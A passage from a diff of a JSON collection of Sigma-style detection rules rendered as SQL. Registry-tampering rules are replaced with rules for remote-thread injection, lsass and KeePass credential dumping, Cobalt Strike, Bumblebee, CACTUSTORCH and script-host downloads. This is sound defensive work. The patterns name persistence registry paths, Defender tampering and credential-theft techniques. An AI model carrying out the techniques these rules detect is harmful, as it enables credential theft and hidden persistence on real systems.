Adversaries may use script to download malicious payloads.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND NewValue = 'DWORD (00000001)')" + "SELECT * FROM logs WHERE (Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" + "filename": "net_connection_win_script.yml" }, { - "title": "Persistence Via Disk Cleanup Handler - Autorun", - "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", - "status": "experimental", - "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CobaltStrike Process Injection", + 
"id": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "status": "test", + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "author": "Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (NewValue LIKE '%cmd%' ESCAPE '\\' OR NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%wsl%' ESCAPE '\\' OR NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\')" ], - "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" }, { - "title": "Potential Attachment Manager Settings Associations Tamper", - "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "title": "Remote Thread Creation Ttdinject.exe Proxy", + "id": 
"c15e99a3-c474-48ab-b9a7-84549a7a9d16", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\'" ], - "filename": "registry_set_policies_associations_tamper.yml" + "filename": "create_remote_thread_win_ttdinjec.yml" }, { - "title": "Hide Schedule Task Via Index Value Tamper", - "id": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", + "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", + "id": "fb656378-f909-47c1-8747-278bf09f4f4f", "status": "experimental", - "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides 
it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml" + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Windows Defender Exclusions Added - Registry", - "id": "a982fc9c-6333-4ffb-a51d-addb04e8b529", - "status": "test", - "description": "Detects the Setting of Windows Defender Exclusions", - "author": "Christian Burkard (Nextron Systems)", + "title": "Bumblebee Remote Thread Creation", + "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "status": "experimental", + "description": "Detects remote thread injection events based on action seen used by bumblebee", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ - "Administrator actions" + "Unknown" ], - "level": "medium", + "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_defender_exclusions.yml" + "filename": "create_remote_thread_win_bumblebee.yml" }, { - "title": "CurrentControlSet Autorun Keys Modification", - "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "title": "Remote Thread Creation in Suspicious Targets", + "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects a remote thread creation in suspicious target images", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.003" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (NewValue LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR NewValue LIKE 'CutePDF Writer' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND NewValue = 'VNCpm.dll')))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR 
((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" + "filename": "create_remote_thread_win_susp_targets.yml" }, { - "title": "Persistence Via New SIP Provider", - "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "title": "Remote Thread Creation Via PowerShell In Rundll32", + "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a remote thread from a Powershell process in a rundll32 process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1553.003" + "attack.execution", + "attack.t1218.011", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate SIP being registered by the OS or different software." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((NewValue IN ('WINTRUST.DLL', 'mso.dll')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" ], - "filename": "registry_set_sip_persistence.yml" + "filename": "create_remote_thread_win_powershell_crt_rundll32.yml" }, { - "title": "Internet Explorer Autorun Keys Modification", - "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "title": "CreateRemoteThread API and LoadLibrary", + "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - 
"attack.t1547.001" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" ], - "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" + "filename": "create_remote_thread_win_loadlibrary.yml" }, { - "title": "Modification of Explorer Hidden Keys", - "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", - "status": "experimental", - "description": "Detects modifications to the hidden files keys in registry. 
This technique is abused by several malware families to hide their files from normal users.", - "author": "frack113", + "title": "CACTUSTORCH Remote Thread Creation", + "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", + "status": "test", + "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "author": "@SBousseaden (detection), Thomas Patzke (rule)", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1055.012", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_hide_file.yml" + "filename": "create_remote_thread_win_cactustorch.yml" }, { - "title": "Add DisallowRun Execution to Registry", - "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "title": "KeePass Password Dumping", + "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", "status": "experimental", - "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", - "author": "frack113", + "description": "Detects remote thread 
creation in KeePass.exe indicating password dumping activity", + "author": "Timon Hackenjos", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1555.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\'" ], - "filename": "registry_set_disallowrun_execution.yml" + "filename": "create_remote_thread_win_password_dumper_keepass.yml" }, { - "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", - "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "title": "Suspicious Remote Thread Source", + "id": "66d31e5f-52d6-40a4-9615-002d3789a119", "status": "experimental", - "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Perez Diego (@darkquassar), oscd.community", "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1055" 
], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' 
ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 
'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" ], - "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" + "filename": "create_remote_thread_win_susp_remote_thread_source.yml" }, { - "title": "COM Hijack via Sdclt", - "id": "07743f65-7ec9-404a-a519-913db7118a8d", - "status": "test", - "description": "Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'", - "author": "Omkar Gudhate", + "title": "Password Dumper Remote Thread in LSASS", + "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "status": "stable", + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. 
A single execution can lead to hundreds of events.\n", + "author": "Thomas Patzke", "tags": [ - "attack.privilege_escalation", - "attack.t1546", - "attack.t1548" + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Antivirus products" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" ], - "filename": "registry_set_comhijack_sdclt.yml" + "filename": "create_remote_thread_win_password_dumper_lsass.yml" }, { - "title": "ServiceDll Hijack", - "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", + "title": "Suspicious Remote Thread Target", + "id": "f016c716-754a-467f-a39e-63c06f773987", "status": "experimental", - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. 
This is often used as a method of persistence.", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Administrative scripts", - "Installation of a service" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((NewValue LIKE 